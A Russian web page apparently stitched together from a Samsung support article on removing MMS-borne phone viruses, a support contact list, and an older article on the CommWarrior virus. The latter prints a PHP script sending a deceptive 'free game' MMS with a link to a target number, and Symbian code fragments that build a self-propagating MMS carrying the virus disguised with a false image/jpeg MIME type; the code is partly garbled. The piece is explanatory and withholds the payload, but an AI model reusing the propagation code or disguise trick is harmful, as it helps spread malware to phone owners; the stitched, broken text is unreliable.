Меню Закрыть

Вирус на телефоне ммс

Содержание

Случается, на смартфон приходит ММС-сообщение от неизвестного номера с ссылкой на непонятный сайт. Если это произошло с вами и вы еще не успели перейти по ссылке, не делайте этого, а немедленно удалите сообщение! В нем с высокой долей содержится вирус или вредоносный файл. А если вы перешли по ссылке и на смартфон «проник» вирус, нужно его удалять. Как?

Если есть возможность, через Play Market установите антивирус на свой вкус. Если антивирус после установки запустился, считайте, вам повезло, потому что он может свернуться, не успев загрузиться. Это действия того самого зловреда.

Если с антивирусом не сложилось, тогда действуйте иначе. Первым делом запустите безопасный режим по этой инструкции — без него ничего сделать не выйдет. После запуска вы должны увидеть надпись «Безопасный режим».

Зайдите в раздел «Приложения».

Найдите приложение, отвечающее за СМС и/или ММС-сообщения, откройте его. Это стороннее приложение, поэтому оно в любом случае должно удаляться.

Нажмите на кнопку «Удалить».

Если кнопки вы не видите, но прекрасно понимаете, что это постороннее приложение, которое вы точно не устанавливали, зайдите в раздел «Безопасность».

Далее выберите «Администраторы устройства».

Здесь найдите это самое приложение, которое не можете удалить, и снимите с него галочку.

Попробуйте удалить приложение вновь. Если все ОК, просто перезагрузите смартфон — он загрузится в обычном режиме. Теперь проблем быть не должно. Главное, чтобы вы не удалили встроенное приложение для СМС и ММС, но это крайне маловероятно.

Что случилось

Неизвестные мошенники рассылают сообщения с вирусом всем подряд. После установки вируса списываются все деньги с SIM-карты. Также могут списать деньги с банковской карты. Сообщение выглядит примерно так:

Что делать, если пришло подобное сообщение

Удалите его как можно быстрее. Не открывайте ссылки из сообщения. Предупредите всех близких и знакомых.

Что делать, если открыли ссылку и установили вирус

Лучше проверить устройство несколькими антивирусами по очереди. Перед установкой нового антивируса, удалите старый.

Как вернуть деньги, которые украли

Обратитесь к оператору сотовой связи или напишите заявление в полицию. К сожалению, гарантий, что деньги вернут, нет.

Связанные вопросы

Благодарим за отзыв!

Ответьте на все вопросы.

Не удается найти нужные сведения? Мы поможем вам.

Онлайн

Задавайте вопросы и получайте ответы прямо в социальной сети

Проконсультируйтесь с техническим специалистом онлайн с 9 до 20 по МСК

Ответим на общие и технические вопросы в течение 24 часов

Оставьте жалобу или предложение

Телефонный звонок

Россия, бесплатно с городских и мобильных телефонов местных сотовых операторов
24 часа / 7 дней в неделю поддержка по мобильной технике
ПН — ВС, с 07 до 22 часов по Москве по другим продуктам

Азербайджан, бесплатно с городских и мобильных телефонов для абонентов Aze, Azercell, Azerfon, BakcelL, Catel
ПН — ВС, с 08 до 23 часов на русском языке
ПН — ВС, с 09 до 21 часа на азербайджанском языке

Армения, бесплатно: с городских и мобильных телефонов для абонентов Билайн и Юком; с мобильных телефонов для абонентов МТС; с городских телефонов для абонентов Ростелеком.
ПН — ВС, с 08 до 23 часов на русском языке
ПН — ВС, с 10 до 21 часов на армянском языке

Беларусь, бесплатно с городских и мобильных телефонов для абонентов МТС
ПН — ВС, с 07 до 22 часов

Читайте также:  Как подключить samsung gear iconx к iphone

Грузия, бесплатно с городских и мобильных телефонов местных сотовых операторов
ПН — ВС, с 08 до 23 часов на русском языке
ПН — ПТ, с 09 до 21 часа на грузинском языке

Казахстан, бесплатно с мобильных телефонов для абонентов Activ, Beeline, Kcell, Altel, Tele2
ПН — ВС, с 10 до 01 часа на русском языке
ПН — ВС, с 10 до 22 часов на казахском языке

Казахстан, бесплатно с городских телефонов
ПН — ВС, с 10 до 01 часа на русском языке
ПН — ВС, с 10 до 22 часов на казахском языке

Кыргызстан, бесплатно с мобильных телефонов для абонентов Beeline, MegaСom, О!
ПН — ВС, с 10 до 01 часа на русском языке
ПН — ВС, с 10 до 22 часов на киргизском языке

Кыргызстан, бесплатно с городских телефонов
ПН — ВС, с 10 до 01 часа на русском языке
ПН — ВС, с 10 до 22 часов на киргизском языке

Молдова, оплата по тарифам оператора
ПН — ВС, с 07 до 22 часов на русском языке
ПН — ПТ, с 08 до 17 часов на румынском языке

Монголия, бесплатно с городских телефонов местных сотовых операторов
ПН — ПТ, с 09 до 18 часов

Таджикистан, бесплатно с мобильных телефонов для абонентов МегаФон, Tcell, Zet-Mobile
ПН — ПТ, с 09 до 24 часов на русском языке
ПН — ПТ, с 09 до 21 часа на таджикском языке

Таджикистан, бесплатно с городских телефонов
ПН — ПТ, с 09 до 24 часов на русском языке
ПН — ПТ, с 09 до 21 часа на таджикском языке

Узбекистан, бесплатно с мобильных телефонов для абонентов Beeline, Ucell
ПН — ВС, с 09 до 24 часов на русском языке
ПН — ВС, с 09 до 21 часа на узбекском языке

Узбекистан, бесплатно с городских телефонов
ПН — ВС, с 09 до 24 часов на русском языке
ПН — ПТ, с 9 до 22 часов; СБ — ВС, с 10 до 22 часов на узбекском языке

Украина, бесплатно с городских телефонов и мобильных телефонов местных сотовых операторов
24 часа / 7 дней в неделю

*Для получения информации по принтерам посетите веб-сайт HP .

Индивидуальная поддержка

Нужен ремонт или комплектующие? Приходите в сервисные центры Samsung

Бесплатная доставка вашего смартфона в сервисный центр и обратно курьером

Настроим, перенесем данные, обновим прошивку и обучим пользоваться смартфоном или планшетом

Нужна помощь?

Если нужна быстрая консультация, выберите вариант «Начать чат». Также можно отправить нам сообщение электронной почты, и мы свяжемся с вами в ближайшее время.

Закрыть всплывающее окно

Где указан номер модели?

Не удается найти номер модели? Выберите продукт
в меню ниже, чтобы узнать, где найти его номер.

Использование популярного особенно среди молодежи MMS-сервиса таит в себе немало опасностей, о которых большинство пользователей, к сожалению, не подозревает.

В один прекрасный день вы можете получить MMS-сообщение или от вашего знакомого, или с неизвестного вам телефонного номера, или даже якобы от вашего сотового оператора. Откроете его и заразите свой телефон вирусом. В тексте зараженных MMS-сообщений может содержаться информация о том, что в приложении к нему находится бесплатная игра от вашего сотового оператора, новый рингтон от друга или архив с фотографиями от вашей дочери. Все это будет убеждать вас в необходимости скачать, установить или сохранить на карте памяти то, что было прислано в сообщении. Иногда в MMS-сообщении может находиться ссылка на какое-либо приложение или какой-то архив в Интернете.

MMS-сообщение, которое вы откроете на своем мобильном телефоне, не только может заразить ваш аппарат вирусом, но и разослать зараженные сообщения на номера телефонов из вашей записной книги.

Опаснее всего то, что когда ваш телефон будет заражен подобным образом, он сам станет атаковать абонентов мобильной связи из вашего списка контактов. То есть ваши друзья, знакомые или коллеги будут получать от вас MMS-сообщения с вирусом. В свою очередь пораженные сотовые телефоны ваших коллег начнут атаковать телефонные номера из своих адресных книг. Подобный процесс будет иметь лавинный характер и, в конечном итоге, может привести к массовым заражениям мобильных устройств.

Читайте также:  Почему использование кодовых страниц для кодирования текста

В настоящее время подобные сценарии не очень распространены из-за того, что популярность MMS-сервисов недостаточно высока, а мобильный Интернет стоит дорого. Далеко не каждый пользователь станет закачивать себе на сотовый телефон прикрепленную программу или архив, предпочитая сделать это дома на стационарном компьютере, где это будет более экономично.

Тем не менее, в условиях падения цен на мобильный Интернет, появления безлимитных тарифов, популяризации MMS-сервиса, а также при соответствующем развитии вирусных технологий, подобные сценарии в будущем могут стать вполне реальными.

MMS (Multimedia Messaging Service) — это сервис передачи сообщений, который обеспечивает автоматическую мгновенную передачу личных мультимедийных сообщений на телефонный номер или на адрес электронной почты. Эта технология кардинально изменила набор услуг, которыми может пользоваться абонент при передаче сообщений. Однако с появлением новых возможностей появились и новые уязвимости.

Так как технология MMS позволяет передавать вместе с сообщением файл приложения, то этим механизмом тут же воспользовались вирусы для своего распространения. В данный момент уже существует подобный вирус. Он носит название CommWarrior. Вредоносная программа поражает телефоны Nokia серии 60 на базе операционной системы Symbian. Действия вируса примитивны и характерны для его аналогов на компьютере: вредоносный код передается на мобильное устройство в виде входящего MMS-сообщения с вложенным медиа-файлом — картинкой, аудио- или видеозаписью.

Внутри самого сообщения находится текст (всего выявлено 20 различных вариантов), который всячески побуждает абонента сотовой связи открыть вложенный файл. О том, как устроен сам вирус, будет рассказано позже, а пока рассмотрим, как злоумышленник может целенаправленно атаковать интересующий его мобильный телефон с помощью MMS. PHP-скрипт, представленный ниже, осуществляет запрос на отправку MMS-сообщения через коммерческий SMS-шлюз по протоколу http/https.

1 5 $text=urlencode(«Бесплатная игра от MegaPone, скачай и играй!»);
6 $to=»79035555555″;
7 $from=»MegaPone»;
8 $mms__url=»http://somesmscenter.ru/game.mms»;
9 $ret= file («http://smscenter.com/auth?user=$user&password=$password&apijd=$apijd»);
10 if ($ret ==»OK») <
11 for ($1=0; $i
(iMtmReg->NewMtmL (KUidMsgTypeMultimedia));

После того, как необходимая предварительная работа выполнена, вирус переходит к созданию самого MMS-сообщения. Для этого необходимо, во-первых, указать, что сообщение создается в каталоге «Черновики» мобильного телефона. Делается это следующим образом.

Метод SwitchCurrentEntryL, вызываемый с параметром Kmsv-DraftEntryld, показывает, что текущим местом создания как раз выбирается каталог «Drafts», то есть как раз каталог «Черновики». После того, как каталог определен, создается MMS-сообщение с параметрами «по умолчанию». Делается это с помощью следующего вызова:

Читайте также:  1С упп праздничные дни

Далее надо инициализировать основные поля сообщения MMS. Для этого с помощью макроса _LIT инициализируются основные переменные. В операционной системе Symbian макрос JLIT создает переменные. Таким образом, с его помощью определяются следующие переменные:

_LIT(KSamsNumber, «07738123456»);
_LIT(KSamsAlias, «Sam»);
_LIT(KPetesNumber, «07812654321»);
_LIT(KMessageSubject, «Nokia ringtoner»);

Переменные могут носить произвольные имена. В приведенном примере в переменной KSamsNumber хранится номер атакуемого абонента, а в создаваемой переменной KSamsAlias хранится его имя, указанное в записной книжке. В переменную KPetesNumber вписывается номер отправителя, а в созданную переменную KMessageSubject записывается тема сообщения. После того как все переменные сформированы, осуществляется инициализация полей уже созданного MMS-сообщения. Делается это с помощью методов AddAddresseeL и SetSubjectL. Первому методу передается параметр EmsvRecipientTo, который определяет поле отправителя. Параметр EmsvRecipientCc инициализирует поле получателя.

iMmsMtm->AddAddresseeL(EMsvRecipientTo, KSamsNumber, KSamsAlias);
iMmsMtm->AddAddresseeL(EMsvRecipientCc, KPetesNumber);
iMmsMtm->SetSubjectL(KMessageSubject);

Далее идет основной процесс — прикрепление приложения.

Для этого сначала создается переменная с именем прикрепляемого к сообщению файла. В рассматриваемом случае в MMS отправляется сам вирус. Поэтому в качестве имени файла указывается имя вирусной программы.

После того как переменная инициализирована, создается экземпляр класса TfileName, который описывает прикрепленное послание. С помощью метода Append созданного объекта attachmentFile инициализируются такие данные, как путь к файлу и имя самого файла.

TFileName attachmentFile(KPhoneRootPath);
attachmentFile.Append(KDirPictures);
attachmentFile. Append(KFileName);

После совершения этих действий вирус создает и описывает служебную информацию по типам прикрепленных файлов. Обычно вирус намеренно указывает неверный тип прикрепленного файла (mime-тип), например, JPG, чтобы пользователь не заподозрил атаку при передаче ему файла по MMS. Определяются mime типы с помощью следующего программного кода.

CMsvMimeHeaders* mimeHeaders = CMsvMimeHeaders::NewL();
CleanupStack::PushL(mimeHeaders);
mimeHeaders->
SetSuggestedFilenameL(KFileName);
_UT8(KMimeType, «image/jpeg»);
TBufC8
mimeType(KMimeType);

Далее инициализируются данные об отправляемом сообщении.

CMsvAttachment* attalnfo = CMsvAttachment::NewL(CMsvAttachment::EMsvFile);
CleanupStack::PushL(attalnfo);
_UT8(KMimeType, «image/jpeg»);
TBufC8 mimeType(KMimeType);

В приведенных выше строках описывается то, что к MMS-сообщению прикреплен только один файл. После того, как все необходимые приготовления выполнены, вызывается метод Create Attachment 2 L и MMS-сообщение создается.

iMmsMtm->CreateAttachment2L(
* store,
attachment,
mimeType,
*mimeHeaders,
attalnfo,
attachld);
CleanupStack::Pop(attalnfo);
CleanupStack::PopAndDestroy(mimeHeaders);

формирование сообщения завершается с помощью следующих программных строк.

store->CommitL();
attachment.Close();
CleanupStack::PopAndDestroy(attachment);
CleanupStack::PopAndDestroy(store);

Само сообщение сохраняется после полной подготовки с помощью метода SaveMessageL().

Наконец отправка сообщения осуществляется следующим образом.

Таким образом, вирус является самораспространяющимся. Описывать, как реализуется вредоносная часть вируса, которая пересылает ваши персональные данные с телефона, мы не будем по понятным причинам. Наша цель — предупредить пользователя о существующей опасности, а не научить злоумышленника создавать вирусы.

ЗАЩИТА ОТ АТАКИ

Для того чтобы обезопасить свой сотовый телефон, необходимо быть крайне аккуратным при получении MMS-сообщения. Помните, что прикрепленное к сообщению вложение вполне может оказаться вирусом. Именно поэтому далеко не всегда стоит принимать MMS-сообщения от незнакомых абонентов. Если же сообщение представляет для вас интерес, то стоит обязательно просканировать приложение антивирусным средством на предмет наличия вирусов.

Если вирус все же попал на ваше мобильное устройство, то возможность безболезненно от него избавиться все же существует. Вы можете лично удалить вредоносный файл, если знаете, где его найти. В случае, если вас атаковал неизвестный вирус, то придется потратить много времени, чтобы его обнаружить. При этом необходимо быть аккуратным, чтобы случайно не удалить системные файлы.

Рекомендуем к прочтению

Добавить комментарий

Ваш адрес email не будет опубликован.